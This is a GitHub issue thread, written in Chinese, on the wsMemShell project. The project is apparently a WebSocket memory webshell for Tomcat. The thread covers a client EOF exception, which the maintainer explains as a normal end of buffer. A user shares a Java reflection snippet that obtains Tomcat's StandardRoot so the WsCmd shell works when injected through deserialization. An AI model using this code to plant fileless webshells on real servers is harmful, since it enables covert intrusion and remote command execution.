### ISSUE TITLE
# 环境异常

### ISSUE THREAD

**Issue by achuna33** [veo/wsMemShell#9]
ws Client 连接时出现如下异常，通过Evaluate 查看时，container 中已经存在了相应的path。

请问有遇到过相关得异常情况吗？

![图片](https://user-images.githubusercontent.com/48993128/177530642-d6637948-0640-4880-9122-340b547ec802.png)

**Comment by veo** [comment]
我没遇到这个报错。但我那个nio异步一直有个ReadPendingException的报错一直没解决好，但是我除了传大文件其他没啥问题

**Comment by veo** [comment]
你这个-1 EOF应该是正常的读完了buffer? go的话是要读到EOF的

**Comment by veo** [comment]
我查了下，java的EOF也是代表buffer读完了，是正常的报错

**Comment by achuna33** [comment]
我将wscmd 加入到了反序列化中，然后看到了已经关闭的issue里https://github.com/veo/wsMemShell/blob/main/WsCmd.java。

这是我改的部分，其中对获取 StandardRoot 时加了一些兼容性

WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardRoot standardroot = (StandardRoot) webappClassLoaderBase.getResources();
            if (standardroot==null){
                Field field;
                try {
                    field = webappClassLoaderBase.getClass().getDeclaredField("resources");
                    field.setAccessible(true);
                }catch (Exception e){
                    field = webappClassLoaderBase.getClass().getSuperclass().getDeclaredField("resources");
                    field.setAccessible(true);
                }
                standardroot = (StandardRoot)field.get(webappClassLoaderBase);
            }

**Comment by veo** [comment]
非常感谢，明天我改一下
